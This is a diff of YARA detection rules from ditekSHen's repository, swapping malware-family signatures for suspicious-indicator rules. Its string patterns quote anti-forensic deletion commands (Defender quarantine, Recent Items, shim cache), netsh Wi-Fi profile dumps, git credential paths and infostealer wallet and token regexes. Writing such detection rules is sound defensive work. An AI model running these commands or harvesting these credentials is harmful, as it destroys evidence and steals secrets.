+		$s2 = "Dashlane\\" ascii wide nocase
+		$s3 = "nordpass*.sqlite" ascii wide nocase
+		$s4 = "RoboForm\\" ascii wide nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $dll* ) and 7 of ( $s* ) ) or ( 11 of ( $* ) ) )
+		uint16( 0 ) == 0x5a4d and 3 of them
 }
-rule DITEKSHEN_MALWARE_Win_Dlagent03 : FILE
+rule DITEKSHEN_INDICATOR_SUSPICIOUS_EXE_Wirelessnetreccon : FILE
 {
 	meta:
-		description = "Detects known Delphi downloader agent downloading second stage payload, notably from discord"
+		description = "Detects executables with interest in wireless interface using netsh"
 		author = "ditekSHen"
-		id = "18493e3d-224f-5000-8e44-9ffda9c65cf0"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "15515523-fe53-5512-95f3-79d0695e7da0"
+		date = "2024-06-08"
+		modified = "2024-06-08"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2732-L2753"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L2101-L2111"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "dea63edd48759fd04875e2eb8ac8b00ff801767f071337c667e31c15f0925cdc"
-		score = 75
-		quality = 50
+		logic_hash = "a8614a8c11e3797e7d7fb7ec2c0705fafc98ce50714e48798594e6fb5bfc1789"
+		score = 40
+		quality = 39
 		tags = "FILE"
-		clamav_sig = "MALWARE.Win.Trojan.DLAgent03"
+		importance = 20
 
 	strings:
-		$delph1 = "FastMM Borland Edition" fullword ascii
-		$delph2 = "SOFTWARE\\Borland\\Delphi" ascii
-		$v1_1 = "InternetOpenUrlA" fullword ascii
-		$v1_2 = "CreateFileA" fullword ascii
-		$v1_3 = "WriteFile" fullword ascii
-		$v2_1 = "WinHttp.WinHttpRequest.5.1" fullword ascii
-		$v2_2 = { 6f 70 65 6e ?? ?? ?? ?? ?? 73 65 6e 64 ?? ?? ?? ?? 72 65 73 70 6f 6e 73 65 74 65 78 74 }
-		$url1 = "https://discord.com/" fullword ascii
-		$url2 = "http://www.superutils.com" fullword ascii
-		$url3 = "http://www.xboxharddrive.com" fullword ascii
+		$s1 = "netsh wlan show profile" ascii wide nocase
+		$s2 = "netsh wlan show profile name=" ascii wide nocase
+		$s3 = "netsh wlan show networks mode=bssid" ascii wide nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 1 of ( $delph* ) and 1 of ( $url* ) and ( all of ( $v1* ) or 1 of ( $v2* ) )
+		uint16( 0 ) == 0x5a4d and all of them
 }
-rule DITEKSHEN_MALWARE_Win_Salfram : FILE
+rule DITEKSHEN_INDICATOR_SUSPICIOUS_EXE_References_Gitconfdata : FILE
 {
 	meta:
-		description = "Detects Salfram executables"
+		description = "Detects executables referencing potentially confidential GIT artifacts. Observed in infostealer"
 		author = "ditekSHen"
-		id = "323e1c8e-2184-5831-9af5-a460c55fbf7c"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "5462491b-f1cf-55ae-b120-ed09eb9549bc"
+		date = "2024-06-08"
+		modified = "2024-06-08"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2755-L2766"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L2113-L2125"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "19d7934727baa870dcd3ec77ba596cd64e49763477ba3feb7baec5ab6d3866d3"
-		score = 75
-		quality = 75
+		logic_hash = "d8b370ea31fade4f6f4ae12903e40026d806862f6c4a7b5818e3942b6b849fd2"
+		score = 40
+		quality = 41
 		tags = "FILE"
-		snort2_sid = "920085-920087"
-		snort3_sid = "920085"
-		clamav_sig = "MALWARE.Win.Trojan.Salfram"
+		importance = 20
 
 	strings:
-		$s1 = "!This Salfram cannot be run in DOS mode." fullword ascii
+		$s1 = "GithubDesktop\\Local Storage" ascii wide nocase
+		$s2 = "GitHub Desktop\\Local Storage" ascii wide nocase
+		$s3 = ".git-credentials" ascii wide
+		$s4 = ".config\\git\\credentials" ascii wide
+		$s5 = ".gitconfig" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		uint16( 0 ) == 0x5a4d and 4 of them
 }
-rule DITEKSHEN_MALWARE_Win_Hawkeyev9
+rule DITEKSHEN_INDICATOR_SUSPICIOUS_EXE_Reversed : FILE
 {
 	meta:
-		description = "Detects HawkEyeV9 payload"
-		author = "ditekshen"
-		id = "ca59aa45-fb55-5f9a-a224-8bd2b72ce5ac"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		description = "Detects reversed executables. Observed N-stage drop"
+		author = "ditekSHen"
+		id = "765b1983-8831-5f7d-9cbd-90af0cd452f7"
+		date = "2024-06-08"
+		modified = "2024-06-08"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2768-L2793"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L2127-L2135"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "d24111930dd0230c01963a90c9fbbc0a0a71df170c2ca116bb329e6158cb681c"
-		score = 75
-		quality = 75
-		tags = ""
-		clamav_sig = "MALWARE.Win.Trojan.HawkEyeV9"
+		logic_hash = "4d031f59b201f5c5c9b69bbbe277cc10c3b5ed8427c5c2f679fdd33c8bc41501"
+		score = 40
+		quality = 45
+		tags = "FILE"
+		importance = 20
 
 	strings:
-		$id1 = "HawkEye Keylogger - Reborn v9 - {0} Logs - {1} \\ {2}" wide
-		$id2 = "HawkEye Keylogger - Reborn v9{0}{1} Logs{0}{2} \\ {3}{0}{0}{4}" wide
-		$str1 = "_PasswordStealer" ascii
-		$str2 = "_KeyStrokeLogger" ascii
-		$str3 = "_ScreenshotLogger" ascii
-		$str4 = "_ClipboardLogger" ascii
-		$str5 = "_WebCamLogger" ascii
-		$str6 = "_AntiVirusKiller" ascii
-		$str7 = "_ProcessElevation" ascii
-		$str8 = "_DisableCommandPrompt" ascii
-		$str9 = "_WebsiteBlocker" ascii
-		$str10 = "_DisableTaskManager" ascii
-		$str11 = "_AntiDebugger" ascii
-		$str12 = "_WebsiteVisitorSites" ascii
-		$str13 = "_DisableRegEdit" ascii
-		$str14 = "_ExecutionDelay" ascii
-		$str15 = "_InstallStartupPersistance" ascii
+		$s1 = "edom SOD ni nur eb tonnac margorp sihT" ascii
 
 	condition:
-		int16 ( 0 ) == 0x5a4d and ( 1 of ( $id* ) or 5 of ( $str* ) )
+		uint16( filesize - 0x2 ) == 0x4d5a and $s1
 }
-rule DITEKSHEN_MALWARE_Win_Hyperbro : FILE
+rule DITEKSHEN_INDICATOR_SUSPICOUS_EXE_UNC_Regex : FILE
 {
 	meta:
-		description = "Detects HyperBro (class names) payload"
+		description = "Detects executables with considerable number of regexes often observed in infostealers"
 		author = "ditekSHen"
-		id = "539b796d-297b-5e2f-84df-282ceaa57bd4"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "968ed633-46ed-5efe-84e5-64718f89fb0a"
+		date = "2024-06-08"
+		modified = "2024-06-08"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2795-L2813"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L2279-L2308"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f6e86ef963de885e0bf92ead075e265618c0745104d223302edd824d409c45cd"
+		logic_hash = "9201469952c2cacebbcbf6801e2c22d018f36742ffbefedc8ee4aa34f413334a"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		clamav_sig = "MALWARE.Win.Trojan.HyperBro"
+		importance = 20
 
 	strings:
-		$s1 = "VTClipboardInfo" ascii wide
-		$s2 = "VTClipboardMgr" ascii wide
-		$s3 = "VTFileRename" ascii wide
-		$s4 = "VTFileRetime" ascii wide
-		$s5 = "VTKeyboardInfo" ascii wide
-		$s6 = "VTKeyboardMgr" ascii wide
-		$s7 = "VTRegeditKeyInfo" ascii wide
-		$s8 = "VTRegeditMgr" ascii wide
-		$s9 = "VTRegeditValueInfo" ascii wide
-		$s10 = "VTFileDataRes" ascii wide
+		$s1 = "^((8|\\+7|\\+380|\\+375|\\+373)[\\- ]?)?(\\(?\\d{3}\\)?[\\- ]?)?[\\d\\- ]{7,10}$" ascii wide
+		$s2 = "(^(1|3)(?=.*[0-9])(?=.*[a-zA-Z])[\\da-zA-Z]{27,34}?[\\d\\- ])|(^(1|3)(?=.*[0-9])(?=.*[a-zA-Z])[\\da-zA-Z]{27,34})$" ascii wide
+		$s3 = "(^L[A-Za-z0-9]{32,34}?[\\d\\- ])|(^L[A-Za-z0-9]{32,34})$" ascii wide
+		$s4 = "(^q[A-Za-z0-9\\:]{32,54}?[\\d\\- ])|(^q[A-Za-z0-9\\:]{32,54})$" ascii wide
+		$s5 = "^(P|p){1}[0-9]?[\\d\\- ]{7,15}|.+@.+\\..+$" ascii wide
+		$s6 = "(^0x[A-Za-z0-9]{40,42}?[\\d\\- ])|(^0x[A-Za-z0-9]{40,42})$" ascii wide
+		$s7 = "(^X[A-Za-z0-9]{32,34}?[\\d\\- ])|(^X[A-Za-z0-9]{32,34})$" ascii wide
+		$s8 = "^41001[0-9]?[\\d\\- ]{7,11}$" ascii wide
+		$s9 = "^R[0-9]?[\\d\\- ]{12,13}$" ascii wide
+		$s10 = "^Z[0-9]?[\\d\\- ]{12,13}$" ascii wide
+		$s11 = "(^(GD|GC)[A-Z0-9]{54,56}?[\\d\\- ])|(^(GD|GC)[A-Z0-9]{54,56})$" ascii wide
+		$s12 = "(^A[A-Za-z0-9]{32,34}?[\\d\\- ])|(^A[A-Za-z0-9]{32,34})$" ascii wide
+		$s13 = "(^t[A-Za-z0-9]{32,36}?[\\d\\- ])|(^t[A-Za-z0-9]{32,36})$" ascii wide
+		$s14 = "(^r[A-Za-z0-9]{32,34}?[\\d\\- ])|(^r[A-Za-z0-9]{32,34})$" ascii wide
+		$s15 = "(^G[A-Za-z0-9]{32,35}?[\\d\\- ])|(^G[A-Za-z0-9]{32,35})$" ascii wide
+		$s16 = "(^D[A-Za-z0-9]{32,35}?[\\d\\- ])|(^D[A-Za-z0-9]{32,35})$" ascii wide
+		$s17 = "(^(T[A-Z])[A-Za-z0-9]{32,35}?[\\d\\- ])|(^(T[A-Z])[A-Za-z0-9]{32,35})$" ascii wide
+		$s18 = "^1[a-km-zA-HJ-NP-Z1-9]{25,34}$" ascii wide
+		$s19 = "^3[a-km-zA-HJ-NP-Z1-9]{25,34}$" ascii wide
+		$s20 = "^([a-zA-Z0-9_\\-\\.]+)@([a-zA-Z0-9_\\-\\.]+)\\.([a-zA-Z]{2,5})$" ascii wide
+		$s21 = "^(?!:\\/\\/)([a-zA-Z0-9-_]+\\.)*[a-zA-Z0-9][a-zA-Z0-9-_]+\\.[a-zA-Z]{2,11}?$" ascii wide
+		$s22 = "[\\w-]{24}\\.[\\w-]{6}\\.[\\w-]{27}|mfa\\.[\\w-]{84}" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 9 of them
+		uint16( 0 ) == 0x5a4d and 6 of them
 }
-rule DITEKSHEN_MALWARE_Linux_UNK01 : FILE
+rule DITEKSHEN_INDICATOR_SUSPICIOUS_Deleterecentitems : FILE
 {
 	meta:
-		description = "Detects unknown/unidentified Linux malware"
+		description = "Detects executables embedding anti-forensic artifacts of deleting Windows Recent Items"
 		author = "ditekSHen"
-		id = "24c6ff35-9378-5a6b-90d1-9740917b1b72"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "58a14ad6-8f32-54d8-b343-88629af8810b"
+		date = "2024-06-08"
+		modified = "2024-06-08"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2815-L2836"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L2310-L2321"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "8bb4822c1c7e0f52726ecafafa696d83c741257587f351360c5295163c245450"
-		score = 75
-		quality = 75
+		logic_hash = "01efada47910a345e7bde4e9295754aefec38355193f45c4630f55050d835cd9"
+		score = 40
+		quality = 37
 		tags = "FILE"
+		importance = 20
 
 	strings:
-		$f1 = "%sresponse.php?status" ascii
-		$f2 = "%supstream.php?mid=%s&os=%s" ascii fullword
-		$f3 = "%supstream.php?tid=%" ascii
-		$f4 = "%sindex.php?token=%.32s&flag=%d&name=%s" ascii fullword
-		$f5 = "%sactive_off.php?id=%d&uniqu=%d" ascii fullword
-		$s1 = "lock:%i usable num:%i n:%i" fullword ascii
-		$s2 = "tid:%.*s tNumber:%i" fullword ascii
-		$s3 = "init.php" fullword ascii
-		$s4 = "mod_drone" fullword ascii
-		$s5 = "new_mid" fullword ascii
-		$s6 = "&exists[]=" fullword ascii
-		$s7 = "&mod[]=" fullword ascii
-		$s8 = "shutdown" fullword ascii
-		$s9 = "&mac[]=%02X%02X%02X%02X%02X%02X" fullword ascii
+		$s1 = "del C:\\Windows\\AppCompat\\Programs\\RecentFileCache.bcf" ascii wide nocase
+		$s2 = "del /F /Q %APPDATA%\\Microsoft\\Windows\\Recent\\*" ascii wide nocase
+		$s3 = "del /F /Q %APPDATA%\\Microsoft\\Windows\\Recent\\CustomDestinations\\*" ascii wide nocase
+		$s4 = "del /F /Q %APPDATA%\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\*" ascii wide nocase
 
 	condition:
-		uint16( 0 ) == 0x457f and ( 3 of ( $f* ) or 6 of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and 2 of them
 }
-rule DITEKSHEN_MALWARE_Linux_UNK02 : FILE
+rule DITEKSHEN_INDICATOR_SUSPICIOUS_Deletewindefenderquarantinefiles : FILE
 {
 	meta:
-		description = "Detects unknown/unidentified Linux malware"
+		description = "Detects executables embedding anti-forensic artifacts of deleting Windows defender quarantine files"
 		author = "ditekSHen"
-		id = "6e62df0d-d329-5e52-af74-2a1f19dc4cca"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "a2b5c531-4e51-5c44-838b-3dffc2ed0263"
+		date = "2024-06-08"
+		modified = "2024-06-08"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2838-L2852"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L2323-L2337"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "4cde21932c27fe3c08495f557b5e086b1fb668d8b5508249891828b9ed48edd4"
-		score = 75
-		quality = 75
+		logic_hash = "1cf82a8fb6c878cb3aaeaf36eb346b2f8038e166e8ce7b5c214769e475ae91de"
+		score = 40
+		quality = 29
 		tags = "FILE"
+		importance = 20
 
 	strings:
-		$rf1 = "[]A\\A]A^A_" ascii
-		$rf2 = "[A\\A]A^A_]" ascii
-		$f1 = "/bin/basH" ascii fullword
-		$f2 = "/proc/seH" ascii fullword
-		$f3 = "/dev/ptsH" ascii fullword
-		$f4 = "pqrstuvwxyzabcde" ascii fullword
-		$f5 = "libnss_%s.so.%d.%d" ascii fullword
+		$s1 = "rmdir C:\\ProgramData\\Microsoft\\Windows Defender\\Quarantine\\Entries /S" ascii wide nocase
+		$s2 = "rmdir C:\\ProgramData\\Microsoft\\Windows Defender\\Quarantine\\Resources /S" ascii wide nocase
+		$s3 = "rmdir C:\\ProgramData\\Microsoft\\Windows Defender\\Quarantine\\ResourceData /S" ascii wide nocase
+		$r1 = "rmdir" ascii wide nocase
+		$p1 = "Microsoft\\Windows Defender\\Quarantine\\Entries /S" ascii wide nocase
+		$p2 = "Microsoft\\Windows Defender\\Quarantine\\Resources /S" ascii wide nocase
+		$p3 = "Microsoft\\Windows Defender\\Quarantine\\ResourceData /S" ascii wide nocase
 
 	condition:
-		uint16( 0 ) == 0x457f and ( all of ( $f* ) and #rf1 > 3 and #rf2 > 3 )
+		uint16( 0 ) == 0x5a4d and ( 2 of ( $s* ) or ( 1 of ( $r* ) and 2 of ( $p* ) ) )
 }
-rule DITEKSHEN_MALWARE_Win_Itranslatorexe : FILE
+rule DITEKSHEN_INDICATOR_SUSPICIOUS_Deleteshimcache : FILE
 {
 	meta:
-		description = "Detects iTranslator EXE payload"
+		description = "Detects executables embedding anti-forensic artifacts of deleting shim cache"
 		author = "ditekSHen"
-		id = "763e8fa4-cf5c-54bc-9310-4e4171bf5a71"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "32b185f2-a11e-522e-822e-7023698975f8"
+		date = "2024-06-08"
+		modified = "2024-06-08"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2854-L2874"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L2339-L2350"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "3c796d58cdf2d4dc4c838d05fb862640c7f9de6c7e8ebb5fb0002821354208d9"
-		score = 75
-		quality = 50
+		logic_hash = "4ecd9e4db082a464735e447f95175ec5b35164d42fce7be862400191c143aa23"
+		score = 40
+		quality = 37
 		tags = "FILE"
-		clamav_sig = "MALWARE.Win.Trojan.iTranslator_EXE"
+		importance = 20
 
 	strings:
-		$s1 = "\\itranslator\\wintrans.exe" fullword wide
-		$s2 = "\\SuperX\\SuperX\\Obj\\Release\\SharpX.pdb" fullword ascii
-		$s3 = "\\itranslator\\itranslator.dll" fullword ascii
-		$s4 = ":Intoskrnl.exe" fullword ascii
-		$s5 = "InjectDrv.sys" fullword ascii
-		$s6 = "SharpX.dll" fullword wide
-		$s7 = "GetMicrosoftEdgeProcessId" ascii
-		$s8 = ".php?type=is&ch=" ascii
-		$s9 = ".php?uid=" ascii
-		$s10 = "&mc=" fullword ascii
-		$s11 = "&os=" fullword ascii
-		$s12 = "&x=32" fullword ascii
+		$s1 = "Rundll32.exe apphelp.dll,ShimFlushCache" ascii wide nocase
+		$s2 = "Rundll32 apphelp.dll,ShimFlushCache" ascii wide nocase
+		$m1 = ".dll,ShimFlushCache" ascii wide nocase
+		$m2 = "rundll32" ascii wide nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 8 of ( $s* )
+		uint16( 0 ) == 0x5a4d and ( 1 of ( $s* ) or all of ( $m* ) )
 }
-rule DITEKSHEN_MALWARE_Win_Itranslatordll : FILE
+rule DITEKSHEN_INDICATOR_SUSPICIOUS_Shredfilesteps : FILE
 {
 	meta:
-		description = "Detects iTranslator DLL payload"
+		description = "Detects executables embedding/copying file shredding steps"
 		author = "ditekSHen"
-		id = "df05da78-3626-5eb5-81a2-a93fba844484"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "2a4ac767-8946-5e58-9087-aa1d3a97b5d5"
+		date = "2024-06-08"
+		modified = "2024-06-08"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2876-L2892"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L2352-L2365"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "ca0479efd241058f358553b6382a1987a5b4c069965f4adb88cd2f3fc4bef21a"
-		score = 75
-		quality = 75
+		logic_hash = "9e784c1d06b232ac2de7318854a59b237aeb88d8e6670fe4ecc9f3230310088a"
+		score = 40
+		quality = 45
 		tags = "FILE"
-		clamav_sig = "MALWARE.Win.Trojan.iTranslator_DLL"
+		importance = 20
 
 	strings:
-		$d1 = "system32\\drivers\\%S.sys" fullword wide
-		$d2 = "\\windows\\system32\\winlogon.exe" fullword ascii
-		$d3 = "\\Registry\\Machine\\SYSTEM\\ControlSet001\\services\\%s" fullword wide
-		$d4 = "\\Registry\\Machine\\SYSTEM\\ControlSet001\\services\\webssx" fullword wide
-		$d5 = "\\Device\\CtrlSM" fullword wide
-		$d6 = "\\DosDevices\\CtrlSM" fullword wide
-		$d7 = "\\driver_wfp\\CbFlt\\Bin\\CbFlt.pdb" ascii
-		$d8 = ".php" ascii
+		$s1 = { 55 00 00 00 aa 00 00 00 92 49 24 00 49 24 92 00
+                24 92 49 00 00 00 00 00 11 00 00 00 22 00 00 00
+                33 00 00 00 44 00 00 00 66 00 00 00 88 00 00 00
+                99 00 00 00 bb 00 00 00 cc 00 00 00 dd 00 00 00
+                ee 00 00 00 ff 00 00 00 6d b6 db 00 b6 db 6d 00
+                db 6d b6 }
 
 	condition:
 		uint16( 0 ) == 0x5a4d and all of them
 }
-rule DITEKSHEN_MALWWARE_Win_Octopus : FILE
+rule DITEKSHEN_INDICATOR_SUSPICIOUS_PWS_Capturescreenshot
 {
 	meta:
-		description = "Detects Octopus trojan payload"
+		description = "Detects PowerShell script with screenshot capture capability"
 		author = "ditekSHen"
-		id = "eb092e23-864f-52f3-bfa4-7e3c616d3984"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "d769936a-a81d-5052-8b1b-7bd5a73b41db"
+		date = "2024-06-08"
+		modified = "2024-06-08"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2894-L2917"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L2367-L2379"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "012b75c94be3021dbcc5b8e8bd62f807c9aa8bc0df94f830a5294aaf0d21b9fc"
-		score = 75
-		quality = 23
-		tags = "FILE"
-		clamav_sig = "MALWARE.Win.Trojan.Octopus"
+		logic_hash = "26e02d7dc242fb2c913b3a7c07e92c84becad62a4cdbae781bce948bfe0eb81b"
+		score = 40
+		quality = 45
+		tags = ""
+		importance = 20
 
 	strings:
-		$s1 = "\\Mozilla\\Firefox\\Profiles\\" fullword wide
-		$s2 = "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" fullword wide
-		$s3 = "\\wbem\\WMIC.exe" fullword wide
-		$s4 = ".profiles.ini" fullword wide
-		$s5 = "PushEBP_" ascii
-		$s6 = "MovEBP_ESP_" ascii
-		$s7 = "Embarcadero Delphi for Win32 compiler" ascii
-		$s8 = "TempWmicBatchFile.bat" fullword wide
-		$wq1 = "computersystem get Name /format:list" wide
-		$wq2 = "os get installdate /format:list" wide
-		$wq3 = "get serialnumber /format:list" wide
-		$wq4 = "\\\\\\\\.\\\\PHYSICALDRIVE" wide
-		$wq5 = "path CIM_LogicalDiskBasedOnPartition" wide
-		$wq6 = "get Antecedent,Dependent" wide
-		$wq7 = "path win32_physicalmedia" wide
+		$encoder = ".ImageCodecInfo]::GetImageEncoders(" ascii nocase
+		$capture1 = ".Sendkeys]::SendWait(\"{PrtSc}\")" ascii nocase
+		$capture2 = ".Sendkeys]::SendWait('{PrtSc}')" ascii nocase
+		$access = ".Clipboard]::GetImage(" ascii nocase
+		$save = ".Save(" ascii nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 6 of ( $s* ) and 5 of ( $wq* ) )
+		$encoder and ( 1 of ( $capture* ) and ( $access or $save ) )
 }
-rule DITEKSHEN_MALWARE_Win_Caspertroy : FILE
+rule DITEKSHEN_INDICATOR_SUSPICIOUS_PWS_Capturebrowserplugins
 {
 	meta:
-		description = "Detects CasperTroy payload"
+		description = "Detects PowerShell script with browser plugins capture capability"
 		author = "ditekSHen"
-		id = "822c3231-60ba-5e60-8df8-06dea80b318a"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "9b1bb195-6e32-5f93-ba70-efcb21b26bb0"
+		date = "2024-06-08"
+		modified = "2024-06-08"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2919-L2931"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L2381-L2394"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "ce070b1e6279ef9fa47f84da7c5166cd93b3e7a0f95541ae14c048b2af9bc431"
-		score = 75
-		quality = 75
-		tags = "FILE"
+		logic_hash = "ac7be8663507e96ecb224f7f09f9092069eab5967598e33c107fa341de86bc77"
+		score = 40
+		quality = 45
+		tags = ""
+		importance = 20
 
 	strings:
-		$s1 = "DllTroy.dll" fullword ascii
-		$s2 = "Content-Disposition: form-data; name=\"image\"; filename=\"title.gif\"" fullword ascii
-		$s3 = "Content-Disposition: form-data; name=\"COOKIE_ID\"" fullword ascii
-		$s4 = "Content-Disposition: form-data; name=\"PHP_SESS_ID\"" fullword ascii
-		$s5 = "Content-Disposition: form-data; name=\"SESS_ID\"" fullword ascii
+		$s1 = "$env:APPDATA +" ascii nocase
+		$s2 = "[\\w-]{24}\\.[\\w-]{6}\\.[\\w-]{27}|mfa\\.[\\w-]{84}" ascii nocase
+		$s3 = "\\leveldb" ascii nocase
+		$o1 = ".Match(" ascii nocase
+		$o2 = ".Contains(" ascii nocase
+		$o3 = ".Add(" ascii nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 4 of them
+		2 of ( $s* ) and 2 of ( $o* )
 }
-rule DITEKSHEN_MALWARE_Win_Rasftuby : FILE
+rule DITEKSHEN_INDICATOR_SUSPICIOUS_IMG_Embedded_B64_EXE : FILE
 {
 	meta:
-		description = "Detects Rasftuby/DarkCrystal"
+		description = "Detects images with specific base64 markers and/or embedding (reversed) base64-encoded executables"
 		author = "ditekSHen"
-		id = "908624a8-0068-5512-a5d0-77ce1f4efd80"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "c620b461-5ad8-530b-a3e1-f75a9e30534e"
+		date = "2024-06-08"
+		modified = "2024-06-08"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2933-L2950"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L2396-L2413"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b769c1986d23173cf8a8a3c8a14d388a7c0327e46d936fc97c449dc55f2a5575"
-		score = 75
-		quality = 75
+		logic_hash = "0fe1328aba3b30820e3885c87a93e52306bd25abc5912378a12e1213a686cd39"
+		score = 40
+		quality = 45
 		tags = "FILE"
-		clamav_sig = "MALWARE.Win.Trojan.DarkCrystal.RAT-Rasftuby"
+		importance = 20
 
 	strings:
-		$s1 = "/DCRS/main.php?data=active" fullword ascii wide
-		$s2 = "/socket.php?type=__ds_" ascii wide
-		$s3 = "/uploader.php" fullword ascii wide
-		$s4 = "del \\\"%USERPROFILE%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\System.lnk\\\"" fullword ascii wide
-		$s5 = "Host:{0},Port:{1},User:{2},Pass:{3}<STR>" fullword ascii wide
-		$s6 = "keyloggerstart_status" fullword ascii wide
-		$s7 = "keyloggerstop_status" fullword ascii wide
-		$s8 = "[PRINT SCREEN]" fullword ascii wide
-		$s9 = "DCS.Internal" ascii
+		$m1 = "<<BASE64_START>>" ascii
+		$m2 = "<<BASE64_END>>" ascii
+		$m3 = "BASE64_START" ascii
+		$m4 = "BASE64_END" ascii
+		$m5 = "BASE64-START" ascii
+		$m6 = "BASE64-END" ascii
+		$m7 = "BASE64START" ascii
+		$m8 = "BASE64END" ascii
+		$h1 = "TVqQA" ascii
+		$h2 = "AQqVT" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 5 of ( $s* )
+		( uint32( 0 ) == 0xd8ff or uint32( 0 ) == 0x474e5089 or uint16( 0 ) == 0x4d42 ) and ( ( 2 of ( $m* ) ) or ( 1 of ( $h* ) ) )
 }
-rule DITEKSHEN_MALWARE_Win_Protonbot : FILE
